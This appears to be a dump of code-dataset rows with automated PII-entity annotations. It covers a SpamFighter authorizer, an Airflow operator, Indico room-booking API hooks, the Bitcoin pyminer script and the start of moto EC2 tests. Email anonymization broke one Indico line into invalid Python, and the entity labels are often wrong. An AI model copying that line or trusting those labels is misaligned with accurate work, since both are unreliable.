# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SpamFighter. If not, see <http://www.gnu.org/licenses/>.
#
"""
Модуль авторизации партнеров без логинов/паролей (на доверии).
"""
from zope.interface import implements
from twisted.internet import defer
from spamfighter.interfaces import IPartner, IPartnerAuthorizer
from spamfighter.core.partner import PartnerAuthorizationFailedError
from spamfighter.core.domain import getDefaultDomain, BaseDomain
from spamfighter.plugin import loadPlugin, IDefaultDomainProvider
from spamfighter.utils import config
class NullPartner(object):
"""
Партнер, авторизованный без логина/пароля (на доверии).
@ivar domain: корневой домен партнера
@type domain: L{BaseDomain}
"""
implements(IPartner)
def __init__(self):
"""
Конструктор.
"""
domainProvider = loadPlugin(IDefaultDomainProvider, config.plugins.domain.null_partner_domain_provider)
self.domain = domainProvider.getDefaultDomain()
def rootDomain(self):
"""
Получить корневой домен партнера.
@return: Deferred, корневой домен (L{IDomain})
@rtype: C{twisted.internet.defer.Deferred}
"""
return defer.succeed(self.domain)
class NullPartnerAuthorizer(object):
"""
Провайдер авторизации партнеров без логина/пароля (на доверии).
В этой ситуации доступ к СпамоБорцу ограничен с помощью других средств
(HTTP-proxy, firewall).
@ivar partner: единственный партнер, который обеспечивает весь доступ
@type partner: L{NullPartner}
"""
implements(IPartnerAuthorizer)
def __init__(self):
"""
Конструктор.
"""
self.partner = NullPartner()
def authorize(self, partner_info):
"""
Выполнить авторизацию партнера.
@param partner_info: информация о партнере
@return: Deferred, партнер (L{IPartner})
@rtype: C{twisted.internet.defer.Deferred}
"""
if partner_info is not None:
return defer.fail(PartnerAuthorizationFailedError())
return defer.succeed(self.partner)
| 2,802 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', 'SpamFighter, Copyright 2008'], ['DATE_TIME', '2009'], ['PERSON', 'Модуль авторизации'], ['PERSON', 'паролей'], ['PERSON', 'Партнер'], ['PERSON', 'Получить'], ['NRP', '@rtype'], ['NRP', 'Провайдер'], ['LOCATION', 'партнеров без логина'], ['LOCATION', 'доступ'], ['PERSON', 'который обеспечивает весь'], ['NRP', 'self.partner'], ['PERSON', 'Выполнить авторизацию'], ['NRP', '@rtype'], ['URL', 'http://netstream.ru/,'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'zope.int'], ['URL', 'twisted.int'], ['URL', 'spamfighter.int'], ['URL', 'spamfighter.core.pa'], ['URL', 'spamfighter.core.do'], ['URL', 'spamfighter.pl'], ['URL', 'config.plugins.domain.nu'], ['URL', 'self.do'], ['URL', 'domainProvider.ge'], ['URL', 'twisted.internet.defer.De'], ['URL', 'defer.su'], ['URL', 'self.do'], ['URL', 'self.pa'], ['URL', 'twisted.internet.defer.De'], ['URL', 'defer.su'], ['URL', 'self.pa']] |
65 | """
.. module:: operators.dive_operator
:synopsis: DivePythonOperator for use with TaskRunner
.. moduleauthor:: Laura Lorenz dummy@email.com
.. moduleauthor:: Miriam Sexton dummy@email.com
"""
from airflow.operators import PythonOperator
from .dive_operator import DiveOperator
class DivePythonOperator(DiveOperator, PythonOperator):
"""
Python operator that can send along data dependencies to its callable.
Generates the callable by initializing its python object and calling its method.
"""
def __init__(self, python_object, python_method="run", *args, **kwargs):
self.python_object = python_object
self.python_method = python_method
kwargs['python_callable'] = None
super(DivePythonOperator, self).__init__(*args, **kwargs)
def pre_execute(self, context):
context.update(self.op_kwargs)
context.update({"data_dependencies": self.data_dependencies})
instantiated_object = self.python_object(context)
self.python_callable = getattr(instantiated_object, self.python_method)
| 1,075 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Laura Lorenz'], ['PERSON', 'Miriam Sexton'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py']] |
66 | # -*- coding: utf-8 -*-
##
##
## This file is part of Indico
## Copyright (C) 2002 - 2013 European Organization for Nuclear Research (CERN)
##
## Indico is free software: you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation, either version 3 of the
## License, or (at your option) any later version.
##
## Indico is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Indico. If not, see <http://www.gnu.org/licenses/>.
from datetime import datetime
import icalendar
import pytz
from babel.dates import get_timezone
from sqlalchemy import Time, Date
from sqlalchemy.sql import cast
from werkzeug.datastructures import OrderedMultiDict, MultiDict
from indico.core.config import Config
from indico.core.db import db
from indico.core.errors import IndicoError
from indico.modules.rb.utils import rb_check_user_access
from indico.modules.rb.models.reservations import Reservation, RepeatMapping, RepeatFrequency, ConflictingOccurrences
from indico.modules.rb.models.locations import Location
from indico.modules.rb.models.rooms import Room
from indico.util.date_time import utc_to_server
from indico.web.http_api import HTTPAPIHook
from indico.web.http_api.metadata import ical
from indico.web.http_api.responses import HTTPAPIError
from indico.web.http_api.util import get_query_parameter
from MaKaC.authentication import AuthenticatorMgr
from MaKaC.common.info import HelperMaKaCInfo
class RoomBookingHookBase(HTTPAPIHook):
GUEST_ALLOWED = False
def _getParams(self):
super(RoomBookingHookBase, self)._getParams()
self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None
self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None
self._occurrences = _yesno(get_query_parameter(self._queryParams, ['occ', 'occurrences'], 'no'))
def _hasAccess(self, aw):
return Config.getInstance().getIsRoomBookingActive() and rb_check_user_access(aw.getUser())
@HTTPAPIHook.register
class RoomHook(RoomBookingHookBase):
# e.g. /export/room/CERN/23.json
TYPES = ('room',)
RE = r'(?P<location>[\w\s]+)/(?P<idlist>\w+(?:-[\w\s]+)*)'
DEFAULT_DETAIL = 'rooms'
MAX_RECORDS = {
'rooms': 500,
'reservations': 100
}
VALID_FORMATS = ('json', 'jsonp', 'xml')
def _getParams(self):
super(RoomHook, self)._getParams()
self._location = self._pathParams['location']
self._ids = map(int, self._pathParams['idlist'].split('-'))
if self._detail not in {'rooms', 'reservations'}:
raise HTTPAPIError('Invalid detail level: %s' % self._detail, 400)
def export_room(self, aw):
loc = Location.find_first(name=self._location)
if loc is None:
return
# Retrieve rooms
rooms_data = list(Room.get_with_data('vc_equipment', 'non_vc_equipment',
filters=[Room.id.in_(self._ids), Room.location_id == loc.id]))
# Retrieve reservations
reservations = None
if self._detail == 'reservations':
reservations = OrderedMultiDict(_export_reservations(self, True, False, [
Reservation.room_id.in_(x['room'].id for x in rooms_data)
]))
for result in rooms_data:
yield _serializable_room(result, reservations)
@HTTPAPIHook.register
class RoomNameHook(RoomBookingHookBase):
# e.g. /export/roomName/CERN/pump.json
GUEST_ALLOWED = True
TYPES = ('roomName', )
RE = r'(?P<location>[\w\s]+)/(?P<room_name>[\w\s\-]+)'
DEFAULT_DETAIL = 'rooms'
MAX_RECORDS = {
'rooms': 500
}
VALID_FORMATS = ('json', 'jsonp', 'xml')
def _getParams(self):
super(RoomNameHook, self)._getParams()
self._location = self._pathParams['location']
self._room_name = self._pathParams['room_name']
def _hasAccess(self, aw):
# Access to RB data (no reservations) is public
return Config.getInstance().getIsRoomBookingActive()
def export_roomName(self, aw):
loc = Location.find_first(name=self._location)
if loc is None:
return
search_str = '%{}%'.format(self._room_name)
rooms_data = Room.get_with_data('vc_equipment', 'non_vc_equipment',
filters=[Room.location_id == loc.id, Room.name.ilike(search_str)])
for result in rooms_data:
yield _serializable_room(result)
@HTTPAPIHook.register
class ReservationHook(RoomBookingHookBase):
# e.g. /export/reservation/CERN.json
TYPES = ('reservation', )
RE = r'(?P<loclist>[\w\s]+(?:-[\w\s]+)*)'
DEFAULT_DETAIL = 'reservations'
MAX_RECORDS = {
'reservations': 100
}
VALID_FORMATS = ('json', 'jsonp', 'xml', 'ics')
@property
def serializer_args(self):
return {'ical_serializer': _ical_serialize_reservation}
def _getParams(self):
super(ReservationHook, self)._getParams()
self._locations = self._pathParams['loclist'].split('-')
def export_reservation(self, aw):
locations = Location.find_all(Location.name.in_(self._locations))
if not locations:
return
for room_id, reservation in _export_reservations(self, False, True):
yield reservation
@HTTPAPIHook.register
class BookRoomHook(HTTPAPIHook):
PREFIX = 'api'
TYPES = ('roomBooking',)
RE = r'bookRoom'
GUEST_ALLOWED = False
VALID_FORMATS = ('json', 'xml')
COMMIT = True
HTTP_POST = True
def _getParams(self):
super(BookRoomHook, self)._getParams()
self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None
self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None
if not self._fromDT or not self._toDT or self._fromDT.date() != self._toDT.date():
raise HTTPAPIError('from/to must be on the same day')
elif self._fromDT >= self._toDT:
raise HTTPAPIError('to must be after from')
elif self._fromDT < datetime.now():
raise HTTPAPIError('You cannot make bookings in the past')
username = get_query_parameter(self._queryParams, 'username')
avatars = username and filter(None, AuthenticatorMgr().getAvatarByLogin(username).itervalues())
if not avatars:
raise HTTPAPIError('Username does not exist')
elif len(avatars) != 1:
raise HTTPAPIError('Ambiguous username ({} users found)'.format(len(avatars)))
avatar = avatars[0]
self._params = {
'room_id': get_query_parameter(self._queryParams, 'roomid'),
'reason': get_query_parameter(self._queryParams, 'reason'),
'booked_for': avatar,
'from': self._fromDT,
'to': self._toDT
}
missing = [key for key, val in self._params.iteritems() if not val]
if missing:
raise HTTPAPIError('Required params missing: {}'.format(', '.join(missing)))
self._room = Room.get(self._params['room_id'])
if not self._room:
raise HTTPAPIError('A room with this ID does not exist')
def _hasAccess(self, aw):
if not Config.getInstance().getIsRoomBookingActive() or not rb_check_user_access(aw.getUser()):
return False
if self._room.can_be_booked(aw.getUser()):
return True
elif self._room.can_be_prebooked(aw.getUser()):
raise HTTPAPIError('The API only supports direct bookings but this room only allows pre-bookings.')
return False
def api_roomBooking(self, aw):
data = MultiDict({
'start_dt': self._params['from'],
'end_dt': self._params['to'],
'repeat_frequency': RepeatFrequency.NEVER,
'repeat_interval': 0,
'room_id': self._room.id,
'booked_for_id': self._params['booked_for'].getId(),
'contact_email': self._params['booked_for'].getEmail(),
'contact_phone': self._params['booked_for'].getTelephone(),
'booking_reason': self._params['reason']
})
try:
reservation = Reservation.create_from_data(self._room, data, aw.getUser())
except ConflictingOccurrences:
raise HTTPAPIError('Failed to create the booking due to conflicts with other bookings')
except IndicoError as e:
raise HTTPAPIError('Failed to create the booking: {}'.format(e))
db.session.add(reservation)
db.session.flush()
return {'reservationID': reservation.id}
def _export_reservations(hook, limit_per_room, include_rooms, extra_filters=None):
"""Exports reservations.
:param hook: The HTTPAPIHook instance
:param limit_per_room: Should the limit/offset be applied per room
:param include_rooms: Should reservations include room information
"""
filters = list(extra_filters) if extra_filters else []
if hook._fromDT and hook._toDT:
filters.append(cast(Reservation.start_dt, Date) <= hook._toDT.date())
filters.append(cast(Reservation.end_dt, Date) >= hook._fromDT.date())
filters.append(cast(Reservation.start_dt, Time) <= hook._toDT.time())
filters.append(cast(Reservation.end_dt, Time) >= hook._fromDT.time())
elif hook._toDT:
filters.append(cast(Reservation.end_dt, Date) <= hook._toDT.date())
filters.append(cast(Reservation.end_dt, Time) <= hook._toDT.time())
elif hook._fromDT:
filters.append(cast(Reservation.start_dt, Date) >= hook._fromDT.date())
filters.append(cast(Reservation.start_dt, Time) >= hook._fromDT.time())
filters += _get_reservation_state_filter(hook._queryParams)
occurs = [datetime.strptime(x, '%Y-%m-%d').date()
for x in filter(None, get_query_parameter(hook._queryParams, ['occurs'], '').split(','))]
data = ['vc_equipment']
if hook._occurrences:
data.append('occurrences')
order = {
'start': Reservation.start_dt,
'end': Reservation.end_dt
}.get(hook._orderBy, Reservation.start_dt)
if hook._descending:
order = order.desc()
reservations_data = Reservation.get_with_data(*data, filters=filters, limit=hook._limit, offset=hook._offset,
order=order, limit_per_room=limit_per_room, occurs_on=occurs)
for result in reservations_data:
yield result['reservation'].room_id, _serializable_reservation(result, include_rooms)
def _serializable_room(room_data, reservations=None):
"""Serializable room data
:param room_data: Room data
:param reservations: MultiDict mapping for room id => reservations
"""
data = room_data['room'].to_serializable('__api_public__')
data['_type'] = 'Room'
data['avc'] = bool(room_data['vc_equipment'])
data['vcList'] = room_data['vc_equipment']
data['equipment'] = room_data['non_vc_equipment']
if reservations is not None:
data['reservations'] = reservations.getlist(room_data['room'].id)
return data
def _serializable_room_minimal(room):
"""Serializable minimal room data (inside reservations)
:param room: A `Room`
"""
data = room.to_serializable('__api_minimal_public__')
data['_type'] = 'Room'
return data
def _serializable_reservation(reservation_data, include_room=False):
"""Serializable reservation (standalone or inside room)
:param reservation_data: Reservation data
:param include_room: Include minimal room information
"""
reservation = reservation_data['reservation']
data = reservation.to_serializable('__api_public__', converters={datetime: _add_server_tz})
data['_type'] = 'Reservation'
data['repeatability'] = None
if reservation.repeat_frequency:
data['repeatability'] = RepeatMapping.get_short_name(*reservation.repetition)
data['vcList'] = reservation_data['vc_equipment']
if include_room:
data['room'] = _serializable_room_minimal(reservation_data['reservation'].room)
if 'occurrences' in reservation_data:
data['occurrences'] = [o.to_serializable('__api_public__', converters={datetime: _add_server_tz})
for o in reservation_data['occurrences']]
return data
def _ical_serialize_repeatability(data):
start_dt_utc = data['startDT'].astimezone(pytz.utc)
end_dt_utc = data['endDT'].astimezone(pytz.utc)
WEEK_DAYS = 'MO TU WE TH FR SA SU'.split()
recur = ical.vRecur()
recur['until'] = end_dt_utc
if data['repeat_frequency'] == RepeatFrequency.DAY:
recur['freq'] = 'daily'
elif data['repeat_frequency'] == RepeatFrequency.WEEK:
recur['freq'] = 'weekly'
recur['interval'] = data['repeat_interval']
elif data['repeat_frequency'] == RepeatFrequency.MONTH:
recur['freq'] = 'monthly'
recur['byday'] = '{}{}'.format(start_dt_utc.day // 7, WEEK_DAYS[start_dt_utc.weekday()])
return recur
def _ical_serialize_reservation(cal, data, now):
start_dt_utc = data['startDT'].astimezone(pytz.utc)
end_dt_utc = datetime.combine(data['startDT'].date(), data['endDT'].timetz()).astimezone(pytz.utc)
event = icalendar.Event()
event.add('uid', dummy@email.com' % data['id'])
event.add('dtstamp', now)
event.add('dtstart', start_dt_utc)
event.add('dtend', end_dt_utc)
event.add('url', data['bookingUrl'])
event.add('summary', data['reason'])
event.add('location', u'{}: {}'.format(data['location'], data['room']['fullName']))
event.add('description', data['reason'].decode('utf-8') + '\n\n' + data['bookingUrl'])
if data['repeat_frequency'] != RepeatFrequency.NEVER:
event.add('rrule', _ical_serialize_repeatability(data))
cal.add_component(event)
def _add_server_tz(dt):
if dt.tzinfo is None:
return dt.replace(tzinfo=get_timezone(HelperMaKaCInfo.getMaKaCInfoInstance().getTimezone()))
return dt
def _yesno(value):
return value.lower() in {'yes', 'y', '1', 'true'}
def _get_reservation_state_filter(params):
cancelled = get_query_parameter(params, ['cxl', 'cancelled'])
rejected = get_query_parameter(params, ['rej', 'rejected'])
confirmed = get_query_parameter(params, ['confirmed'])
archived = get_query_parameter(params, ['arch', 'archived', 'archival'])
repeating = get_query_parameter(params, ['rec', 'recurring', 'rep', 'repeating'])
avc = get_query_parameter(params, ['avc'])
avc_support = get_query_parameter(params, ['avcs', 'avcsupport'])
startup_support = get_query_parameter(params, ['sts', 'startupsupport'])
booked_for = get_query_parameter(params, ['bf', 'bookedfor'])
filters = []
if cancelled is not None:
filters.append(Reservation.is_cancelled == _yesno(cancelled))
if rejected is not None:
filters.append(Reservation.is_rejected == _yesno(rejected))
if confirmed is not None:
if confirmed == 'pending':
filters.append(Reservation.is_pending)
elif _yesno(confirmed):
filters.append(Reservation.is_accepted)
else:
filters.append(~Reservation.is_accepted)
filters.append(Reservation.is_rejected | Reservation.is_cancelled)
if archived is not None:
filters.append(Reservation.is_archived == _yesno(archived))
if repeating is not None:
if _yesno(repeating):
filters.append(Reservation.repeat_frequency != 0)
else:
filters.append(Reservation.repeat_frequency == 0)
if avc is not None:
filters.append(Reservation.uses_vc == _yesno(avc))
if avc_support is not None:
filters.append(Reservation.needs_vc_assistance == _yesno(avc_support))
if startup_support is not None:
filters.append(Reservation.needs_assistance == _yesno(startup_support))
if booked_for:
like_str = '%{}%'.format(booked_for.replace('?', '_').replace('*', '%'))
filters.append(Reservation.booked_for_name.ilike(like_str))
return filters
| 16,517 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['LOCATION', '#'], ['LOCATION', '#'], ['NRP', 'Indico'], ['DATE_TIME', '2002 - 2013'], ['LOCATION', '#'], ['LOCATION', '#'], ['NRP', 'indico.modules.rb.models.rooms'], ['LOCATION', 'super(RoomBookingHookBase'], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'loc = Location.find_first(name='], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'loc = Location.find_first(name='], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'self)._getParams'], ['PERSON', 'self)._getParams'], ['DATE_TIME', "the same day'"], ['PERSON', "HTTPAPIError('You"], ['PERSON', 'NEVER'], ['PERSON', "self._params['reason"], ['PERSON', 'db.session.flush'], ['PERSON', 'include_rooms'], ['PERSON', '.split'], ['PERSON', 'reservations_data = Reservation.get_with_data(*data'], ['PERSON', 'include_rooms'], ['NRP', 'MultiDict'], ['LOCATION', 'serializable_reservation(reservation_data'], ['DATE_TIME', 'daily'], ['DATE_TIME', 'weekly'], ['DATE_TIME', 'monthly'], ['DATE_TIME', 'WEEK_DAYS[start_dt_utc.weekday'], ['PERSON', "data['id"], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'RepeatFrequency.NE'], ['PERSON', 'bookedfor'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'indico.core.co'], ['URL', 'indico.co'], ['URL', 'indico.core.er'], ['URL', 'indico.mo'], ['URL', 'indico.modules.rb.models.re'], ['URL', 'indico.modules.rb.mo'], ['URL', 'indico.modules.rb.models.ro'], ['URL', 'indico.web.ht'], ['URL', 'indico.web.ht'], ['URL', 'api.me'], ['URL', 'indico.web.ht'], ['URL', 'api.re'], ['URL', 'indico.web.ht'], ['URL', 'MaKaC.au'], ['URL', 'MaKaC.common.in'], ['URL', 'fromDT.as'], ['URL', 'toDT.as'], ['URL', 'Config.ge'], ['URL', 'aw.ge'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Location.fi'], ['URL', 'Room.ge'], ['URL', 'Room.id.in'], ['URL', 'loc.id'], ['URL', 'Reservation.ro'], ['URL', 'id.in'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Config.ge'], ['URL', 'Location.fi'], ['URL', 'Room.ge'], ['URL', 'loc.id'], ['URL', 'Room.name.il'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Location.fi'], ['URL', 'Location.name.in'], ['URL', 'HTTPAPIHook.re'], ['URL', 'fromDT.as'], ['URL', 'toDT.as'], ['URL', 'datetime.no'], ['URL', 'params.it'], ['URL', 'Room.ge'], ['URL', 'Config.ge'], ['URL', 'aw.ge'], ['URL', 'room.ca'], ['URL', 'aw.ge'], ['URL', 'room.ca'], ['URL', 'aw.ge'], ['URL', 'RepeatFrequency.NE'], ['URL', 'room.id'], ['URL', 'Reservation.cr'], ['URL', 'aw.ge'], ['URL', 'db.session.ad'], ['URL', 'db.se'], ['URL', 'reservation.id'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'datetime.st'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'order.de'], ['URL', 'Reservation.ge'], ['URL', 'reservations.ge'], ['URL', 'room.to'], ['URL', 'reservation.to'], ['URL', 'reservation.re'], ['URL', 'RepeatMapping.ge'], ['URL', 'reservation.re'], ['URL', 'o.to'], ['URL', 'RepeatFrequency.MO'], ['URL', 'datetime.com'], ['URL', 'event.ad'], ['URL', 'email.com'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'cal.ad'], ['URL', 'dt.tz'], ['URL', 'dt.re'], ['URL', 'HelperMaKaCInfo.ge'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.re'], ['URL', 'Reservation.re'], ['URL', 'Reservation.us'], ['URL', 'Reservation.ne'], ['URL', 'Reservation.ne'], ['URL', 'for.re'], ['URL', 'Reservation.bo'], ['URL', 'name.il']] |
67 | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 9131
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
| 6,434 | [['DATE_TIME', '2011'], ['PERSON', "out_words.append(struct.pack('@I"], ['PERSON', 'Miner'], ['LOCATION', 'targetstr'], ['DATE_TIME', 'the first 76b of 80b'], ['DATE_TIME', '16'], ['PERSON', 'hash1 = hash1_o.digest'], ['LOCATION', 'hash_o.update(hash1'], ['PERSON', 'param_arr ='], ['PERSON', 'hashes_done'], ['DATE_TIME', 'time_end - time_start'], ['PERSON', 'hashes_done'], ['PERSON', 'hashes_done'], ['PERSON', 'scantime'], ['URL', 'http://www.opensource.org/licenses/mit-license.php.'], ['IP_ADDRESS', '::'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'pprint.Pr'], ['URL', 'self.au'], ['URL', 'self.co'], ['URL', 'httplib.HT'], ['URL', 'self.conn.re'], ['URL', 'self.au'], ['URL', 'self.conn.ge'], ['URL', 'resp.re'], ['URL', 'struct.pa'], ['URL', 'words.re'], ['URL', 'self.id'], ['URL', 'self.ma'], ['URL', 'datastr.de'], ['URL', 'targetstr.de'], ['URL', 'hashlib.sh'], ['URL', 'self.ma'], ['URL', 'struct.pa'], ['URL', 'hash.co'], ['URL', 'hashlib.sh'], ['URL', 'time.as'], ['URL', 'time.as'], ['URL', 'rpc.ge'], ['URL', 'time.as'], ['URL', 'rpc.ge'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'self.id'], ['URL', 'self.su'], ['URL', 'self.it'], ['URL', 'sys.ar'], ['URL', 'pyminer.py'], ['URL', 'sys.ar'], ['URL', 're.se'], ['URL', 're.se'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'f.cl'], ['URL', 'p.st'], ['URL', 'time.sl'], ['URL', 'time.as'], ['URL', 'proc.jo'], ['URL', 'time.as']] |
68 | from __future__ import unicode_literals
from botocore.exceptions import ClientError
import pytest
from unittest import SkipTest
import base64
import ipaddress
import six
import boto
import boto3
from boto.ec2.instance import Reservation, InstanceAttribute
from boto.exception import EC2ResponseError
from freezegun import freeze_time
import sure # noqa
from moto import mock_ec2_deprecated, mock_ec2, settings
from tests import EXAMPLE_AMI_ID
from tests.helpers import requires_boto_gte
if six.PY2:
decode_method = base64.decodestring
else:
decode_method = base64.decodebytes
################ Test Readme ###############
def add_servers(ami_id, count):
conn = boto.connect_ec2()
for index in range(count):
conn.run_instances(ami_id)
@mock_ec2_deprecated
def test_add_servers():
add_servers(EXAMPLE_AMI_ID, 2)
conn = boto.connect_ec2()
reservations = conn.get_all_reservations()
assert len(reservations) == 2
instance1 = reservations[0].instances[0]
assert instance1.image_id == EXAMPLE_AMI_ID
############################################
@freeze_time("2014-01-01 05:00:00")
@mock_ec2_deprecated
def test_instance_launch_and_terminate():
conn = boto.ec2.connect_to_region("us-east-1")
with pytest.raises(EC2ResponseError) as ex:
reservation = conn.run_instances(EXAMPLE_AMI_ID, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
